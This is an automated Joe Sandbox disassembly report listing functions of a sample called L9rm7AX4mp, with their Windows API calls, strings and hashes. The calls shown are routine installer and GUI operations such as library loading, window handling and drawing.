                                                                                                      • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                      • API String ID: 142928637-2676053874
                                                                                                      • Opcode ID: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                                                                      • Instruction ID: 2c8c4e1fda890c3dedf4e0e73620de090a3a9d5666271f16a874a7bcdd66483b
                                                                                                      • Opcode Fuzzy Hash: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                                                                      • Instruction Fuzzy Hash: 52E092A1741720EAEA10B7B67CC6F9A2668E714729F54403BF100A51E1C3BD1C80CE9E
                                                                                                      Function 0044C7EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
                                                                                                      • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                      • API String ID: 2238633743-1050967733
                                                                                                      • Opcode ID: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                                                                      • Instruction ID: d5a6e329c062b47ae4ba9e11e7719f1ec1b45dd3e70fac445fdcae0b1af11dcb
                                                                                                      • Opcode Fuzzy Hash: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                                                                      • Instruction Fuzzy Hash: 64F0FE70246305CAFB50BBB5FDC67223694E3A4B0AF18137BE40156192D7BC4444CF4C
                                                                                                      Function 00478B3C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                      • API String ID: 667068680-222143506
                                                                                                      • Opcode ID: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                                                                      • Instruction ID: 8ade474bf949b7c868f23be577f60042bf37b8b7e1302e6d2b868e4e2d48ad49
                                                                                                      • Opcode Fuzzy Hash: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                                                                      • Instruction Fuzzy Hash: D4C0E9F0AC1740EEAA00E7F15CDAD762558D514B34724943F754DAA193D97D58044A2C
                                                                                                      Function 0041B518 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041B58E
                                                                                                      • 73A0A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                                      • 73A14620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                                      • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                                      • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                                      • 73A0A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: E680$A14620A480A570Focus
                                                                                                      • String ID:
                                                                                                      • API String ID: 932946509-0
                                                                                                      • Opcode ID: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                                      • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                                      • Opcode Fuzzy Hash: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                                      • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                                      Function 0045D3B0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                                      • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D4E8,?,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D45A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                      • API String ID: 1452528299-1580325520
                                                                                                      • Opcode ID: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                                      • Instruction ID: bfdb5615fdc952ab51c5d4d36cfcdc52ba3649a349ed7733e19bd606ff263fd4
                                                                                                      • Opcode Fuzzy Hash: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                                      • Instruction Fuzzy Hash: A6117835A04204ABD731DE95C941A5E76DCDF46306F608077AD0596283D67C6F0A952A
                                                                                                      Function 0041BD9C Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                                      • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                                      • 73A14620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                                      • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                                      • 73A0A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A14620MetricsSystem$A480A570
                                                                                                      • String ID:
                                                                                                      • API String ID: 1130675633-0
                                                                                                      • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                      • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                                      • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                      • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                                      Function 00401A90 Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                      • LocalFree.KERNEL32(007F29F0,00000000,00401B68), ref: 00401ACF
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,007F29F0,00000000,00401B68), ref: 00401AEE
                                                                                                      • LocalFree.KERNEL32(007F0C38,?,00000000,00008000,007F29F0,00000000,00401B68), ref: 00401B2D
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                      • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3782394904-0
                                                                                                      • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                      • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                      • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                      • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                      Function 0047E264 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047E272
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CFF1), ref: 0047E298
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047E2A8
                                                                                                      • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2C9
                                                                                                      • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2DD
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long$Show
                                                                                                      • String ID:
                                                                                                      • API String ID: 3609083571-0
                                                                                                      • Opcode ID: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                                                      • Instruction ID: 64a3e6c2176d4acc74ea6130292171d5cd043058eec335b926c35577e1896bc6
                                                                                                      • Opcode Fuzzy Hash: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                                                      • Instruction Fuzzy Hash: DE010CB5651210ABE600D769DE41F66379CAB0D334F0503AAB959DF2E3C729EC009B49
                                                                                                      Function 0041B280 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                                      • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                                      • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                                        • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                      • String ID:
                                                                                                      • API String ID: 3527656728-0
                                                                                                      • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                      • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                                                      • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                      • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                                                      Function 0049772C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00497991,?,?,00000000), ref: 00497762
                                                                                                        • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                        • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                                                        • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                      • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                      • API String ID: 3312786188-1660910688
                                                                                                      • Opcode ID: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                                                                      • Instruction ID: bbf2e7f3574d42a9113524bdb42c94a944b0e97273f2a70b882bd080beededf8
                                                                                                      • Opcode Fuzzy Hash: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                                                                      • Instruction Fuzzy Hash: 8E318F74A10214AFDB00EF65DC82D6E7BB5EB89318B51847AF800AB392D739BD01CB58
                                                                                                      Function 0042EAB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                      • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                      • API String ID: 828529508-2866557904
                                                                                                      • Opcode ID: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                                                                      • Instruction ID: f5c55ae169209784706469d1b6e96428d25835975ad7b3a5622eb1d8c2489c6d
                                                                                                      • Opcode Fuzzy Hash: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                                                                      • Instruction Fuzzy Hash: 2DF022E078062136E620E2BFACC3F6B498C8FA0725F040436F009EA2C2E92C9900422E
                                                                                                      Function 00457E34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457E64
                                                                                                      • GetExitCodeProcess.KERNEL32(?,00498116), ref: 00457E85
                                                                                                      • CloseHandle.KERNEL32(?,00457EB8,?,?,004586D3,00000000,00000000), ref: 00457EAB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                      • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                      • API String ID: 2573145106-3235461205
                                                                                                      • Opcode ID: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                                                      • Instruction ID: 6a931132ee958b8202ab537f65b64b7fb4871f4dbf11571726e28c2ddef09419
                                                                                                      • Opcode Fuzzy Hash: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                                                      • Instruction Fuzzy Hash: 1101A735604704AFDB11EB999D43A1E77A8DB49711F5004B6FC10E73D3D63C9D048618
                                                                                                      Function 0042E9BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                                      • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                      • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                      • API String ID: 3478007392-2498399450
                                                                                                      • Opcode ID: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                                                                      • Instruction ID: 5ef4959e42d5312267b3952f4de6be483a2b5690063b138e9708ef51bd19b1c3
                                                                                                      • Opcode Fuzzy Hash: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                                                                      • Instruction Fuzzy Hash: A3E0ECB1741314EADA106B62BECBF5A2558E724B15F54043BF101751F2C7BD2C80C95E
                                                                                                      Function 00477AB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                      • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                      • API String ID: 1782028327-3855017861
                                                                                                      • Opcode ID: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                                                                      • Instruction ID: 8233eca9c26ae86130ab8a2651ceb45e7b9436c82c984da63702dcb6f06a18e2
                                                                                                      • Opcode Fuzzy Hash: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                                                                      • Instruction Fuzzy Hash: 27D0A7A0208300A6ED10F3F14C47E6F224C8D847587A4C43B7404E3182CABCE900993C
                                                                                                      Function 00416C3C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
